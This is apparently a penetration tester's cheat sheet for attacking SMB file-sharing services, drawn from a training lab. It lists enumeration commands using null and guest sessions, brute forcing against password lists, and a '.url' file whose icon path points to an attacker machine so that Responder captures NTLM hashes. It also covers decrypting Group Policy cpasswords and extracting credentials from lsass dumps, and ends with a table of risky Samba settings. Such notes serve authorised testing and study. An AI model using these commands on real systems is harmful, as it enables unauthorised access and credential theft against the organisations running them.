Server Message Block

Footprinting The Service

Nmap

sudo nmap 10.129.14.128 -sV -sC -p139,445

RPCclient

rpcclient -U "" 10.129.14.128
rpcclient -U'%' 10.10.110.17
-U'%': Explicitly sends an empty username and no password. -N: Does not send any username or password, attempting to establish a null session.
Query
Description

srvinfo

Server information.

enumdomains

Enumerate all domains that are deployed in the network.

querydominfo

Provides domain, server, and user information of deployed domains.

netshareenumall

Enumerates all available shares.

netsharegetinfo <share>

Provides information about a specific share.

enumdomusers

Enumerates all domain users.

queryuser <RID>

Provides information about a specific user.

Search For Known SMB Version Vulnerabilities

Check For Shares Using Null Sessions

smbclient -N -L //$ip/
cme smb $ip --shares -u "guest" -p ""

Brute Forcing

cme smb $ip -u users.list -p pws.list --local-auth | grep '[+]'
If the target

URL File attacks

Test for URL File attacks by creating a file called "@somename.url" with the following contents, upload, spin up smbserver to capture hash

[InternetShortcut]
URL=blah
WorkingDirectory=blah
IconFile=\\EnterAttackerip\%USERNAME%.icon
IconIndex=1

Run Responder to capture hashes

/opt/Responder-3.1.3.0/Responder.py -I tun0

Read / Upload access

Attempt to download and view share contents using valid credential / anonymous login / null session

smbmap -H $ip
smbmap -H $ip -r 
Using smbmap with the -r or -R (recursive) option, one can browse the directories
smbmap -H 10.129.14.128 --download "notes\note.txt"
Downloading
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"
Uploading
smbmap -u guest -p "" -H $ip -A '.*' -R

Cpassword discovery

Search "Groups.xml" for cpassword decryption

gpp-decrypt cpassword

lsass.zip lsass.dmp

search lsass.zip or lsass.dmp to use to dump credentials / keys / tickets

pypykatz lsa minidump "lsass.zip"

Alternate Data Streams (ADS)

test for alternate data streams after discovering 0 byte files

allinfo filename

Check Password Policy

cme smb $ip --pass-pol -u guest -p ""

User Discovery

Check For users using valid credential / anonymous login / null session

cme smb $ip --users -u guest -p ""
cme smb $ip --rid-brute -u guest -p ""

Group discovery

check for groups using valid credential / anonymous login / null session

cme smb $ip --groups -u guest -p ""

Smbclient

Interactively access the smb shares using smbclient

smbclient //$ip/someshare -N
smbclient //$ip/someshare -U 'guest' -N
smbclient //$ip/someshare -U 'validuser' -p 'validpass'

Smbmap

// Some code

Dangerous Settings

Setting
Description

browseable = yes

Allow listing available shares in the current share?

read only = no

Forbid the creation and modification of files?

writable = yes

Allow users to create and modify files?

guest ok = yes

Allow connecting to the service without using a password?

enable privileges = yes

Honor privileges assigned to specific SID?

create mask = 0777

What permissions must be assigned to the newly created files?

directory mask = 0777

What permissions must be assigned to the newly created directories?

logon script = script.sh

What script needs to be executed on the user's login?

magic script = script.sh

Which script should be executed when the script gets closed?

magic output = script.out

Where the output of the magic script needs to be stored?

Last updated